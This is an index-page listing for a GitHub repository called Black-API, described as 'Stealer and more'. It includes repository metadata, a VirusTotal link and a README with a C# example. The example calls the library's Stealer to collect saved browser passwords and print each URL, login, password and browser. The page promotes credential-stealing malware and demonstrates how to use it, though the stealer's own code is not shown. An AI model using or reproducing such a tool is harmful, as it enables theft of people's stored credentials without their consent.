Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nekiplay/black-api
Stealer and more
https://github.com/nekiplay/black-api
Last synced: 24 days ago
JSON representation
Stealer and more
- Host: GitHub
- URL: https://github.com/nekiplay/black-api
- Owner: Nekiplay
- Created: 2021-04-15T14:12:00.000Z (over 3 years ago)
- Default Branch: master
- Last Pushed: 2021-04-15T14:37:22.000Z (over 3 years ago)
- Last Synced: 2024-10-14T03:51:16.805Z (2 months ago)
- Language: C#
- Size: 42 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Black-API
Stealer and more[![Codacy Badge](https://app.codacy.com/project/badge/Grade/7576b1dcd41048f2843e5d4bee57d7bc)](https://www.codacy.com/gh/Nekiplay/Black-API/dashboard?utm_source=github.com&utm_medium=referral&utm_content=Nekiplay/Black-API&utm_campaign=Badge_Grade)
VT: https://www.virustotal.com/gui/file/06e364a178d9a65bc9f3e402841cfb5dc7dd5bba01183f9b6155b10969571676/detection
**Example:**
```C#
BlackAPI.Stealer stealer = new BlackAPI.Stealer();
var stealerresult = stealer.GetPasswords();
if (stealerresult.Work)
{
foreach (var password in stealerresult.Passwords)
{
Console.WriteLine("Url: " + password.url);
Console.WriteLine("Login: " + password.login);
Console.WriteLine("Password: " + password.password);
Console.WriteLine("Browser: " + password.browser);
}
Console.WriteLine("Total passwords: " + stealerresult.Passwords.Count);
}
else
{
Console.WriteLine("Passwords not found");
}
```